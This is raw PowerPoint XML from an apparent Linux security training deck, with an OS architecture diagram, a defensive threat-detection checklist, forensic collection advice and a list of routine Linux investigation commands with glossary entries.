        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2023644" y="6026570"/>
            <a:ext cx="9774679" cy="464660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware Abstraction Layer (HAL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016471" y="2217871"/>
            <a:ext cx="1278218" cy="2097534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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LIBRARIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4915529" y="2206528"/>
            <a:ext cx="1210927" cy="2113079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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SERVICES</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299509" y="2195426"/>
            <a:ext cx="1292620" cy="2122080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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DEVICE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> DRIVERS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13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7778963" y="2210631"/>
            <a:ext cx="1244717" cy="2100113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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APPLICATION IPC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9206345" y="2203442"/>
            <a:ext cx="1188944" cy="2097534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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DEVICE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> DRIVERS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30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10539663" y="2199907"/>
            <a:ext cx="1256089" cy="2097534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM</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34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3515859" y="2214544"/>
            <a:ext cx="1214598" cy="2113079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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SYSTEM PROCESSES</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016471" y="4237012"/>
            <a:ext cx="9774679" cy="534565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic Link Libraries (Shared Libraries)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33593440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Find binaries that do not belong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify binaries match known good packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> jobs / at jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check for binaries with raw sockets listening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check for possible injected memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify PAM modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check SSH access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Detecting Threats on Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7827549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a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collection tools may change artifacts on system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know the programs which modify the metadata of files and directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Investigation should start with most volatile to the least volatile data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detecting methodology may vary </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protecting mission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incident response due to suspected adversary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OSI directed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detecting Threats on Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="149" b="100000" l="0" r="100000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312360" y="1595441"/>
            <a:ext cx="1548741" cy="1376887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492578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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385127336"/>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To the Keyboard – What Shrink Thinks You Should Know</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>w; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>latr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>efH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -MS /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/socket1 root@127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -o “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ControlPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/socket1” @:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>systemd-cgls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>loginctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> list-sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>loginctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show-session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>journalctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | tail -20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | tail -20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lastlog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lastb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Deamon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41272810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alias: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to replace one string with another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at: Combine files and print the standard output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Checksum and count the bytes in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Copy files and directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Change permissions of a file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Change ownership of a file or directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to transfer data from or to a server using a supported protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>diff: Find differences between two files </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echo: Display a line of text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful CLI Syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38939429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find: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Searches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for files in a directory hierarchy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>finger: User information lookup program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
